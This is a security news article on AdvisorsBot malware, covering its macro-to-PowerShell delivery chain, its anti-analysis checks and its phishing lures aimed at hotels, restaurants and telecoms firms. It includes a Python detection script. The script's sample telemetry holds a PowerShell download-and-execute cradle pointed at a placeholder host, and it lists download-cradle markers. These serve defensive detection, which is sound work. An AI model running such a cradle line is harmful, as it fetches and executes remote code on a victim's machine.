Security researchers at Proofpoint have detected a new malware threat that is being used in targeted attacks on hotels, restaurants, and telecoms firms. AdvisorsBot malware, so named because its C&C servers contain the word advisors, was first detected in May 2018 in a variety of spam email campaigns.
AdvisorsBot malware is still under development, but its current form has already been used in multiple attacks around the globe, with the bulk of those attacks conducted in the United States. The spam campaigns are believed to be conducted by a threat actor known to Proofpoint researchers as TA555.
AdvisorsBot is not related to Marap malware, although it operates in a similar fashion in that the malware is a first-stage payload which is used to fingerprint the victim and identify whether the target is of interest and worthy of a more extensive compromise. Proofpoint notes that these malware variants are two examples of a growing trend of highly versatile modular malware that can be used in a variety of different attacks.
AdvisorsBot malware is written in C, although another form of the malware has been identified that is written in PowerShell with a .NET DLL embedded inside the PowerShell script. This form of the malware, named PoshAdvisor, runs in memory without writing any data to disk.
The researchers note that these malware variants have many anti-analysis features: they can detect a variety of malware analysis tools and can determine whether they are running on a virtual machine. If a VM or analysis tools are detected, the malware exits.
The spam emails used to deliver the malware contain a Word attachment with a macro that, if allowed to run, executes a PowerShell command. That command downloads a PowerShell script containing embedded shellcode, which in turn runs AdvisorsBot.
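The delivery chain above (Office macro spawning PowerShell, which then downloads a second-stage script) is the part of the attack that endpoint telemetry can see. The following added example, which is not Proofpoint's code or part of the original report, scores process-creation events for that parent/child pattern and for download-cradle markers in the PowerShell command line; the event records and field names are constructed for illustration and do not come from a real sensor.

```python
import re

# Constructed process-creation events (not real telemetry). Fields mirror what
# endpoint sensors typically record: parent image, child image, command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -ep bypass -c "
                "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c echo hello"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# Download-cradle and obfuscation markers typical of macro-launched PowerShell stagers.
CRADLE_MARKERS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|iwr\b|net\.webclient|"
    r"iex\b|invoke-expression|-enc\b|-encodedcommand|frombase64string",
    re.IGNORECASE,
)

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Severity for one event: None if the parent is not an Office process,
    'high' for Office -> PowerShell with cradle markers (markers listed),
    'medium' for Office -> PowerShell without markers, 'low' for any other child."""
    parent, child = basename(event["parent"]), basename(event["image"])
    if parent not in OFFICE_PARENTS:
        return None
    if child in SCRIPT_HOSTS:
        markers = sorted({m.lower() for m in CRADLE_MARKERS.findall(event["cmdline"])})
        return ("high", markers) if markers else ("medium", [])
    return ("low", [])

def scan(events):
    """Return (index, severity, markers) for every event that classify() flags."""
    return [(i, *res) for i, ev in enumerate(events) if (res := classify(ev))]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

A "high" hit on a user workstation is worth an immediate triage; the "medium" and "low" tiers exist because some line-of-business add-ins legitimately launch child processes from Office.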
Three different email lures have been detected, each of which targets a specific industry sector. While the campaign appears to be targeted, emails have also been delivered to recipients unrelated to the content of the lures, which suggests a more random distribution of the emails.
Hotels are being targeted with a message that claims to have been sent by a person who has previously stayed at the hotel and has been charged twice for the stay. The email attachment appears to be a bank statement showing the double charge.
The emails targeting restaurants claim that the sender of the email visited the restaurant and suffered complicated, extreme food poisoning. The email attachment contains details of illness and the opinion of a physician, along with a threat of legal action.
The emails targeting telecoms firms claim to be a resume sent in a speculative application for employment.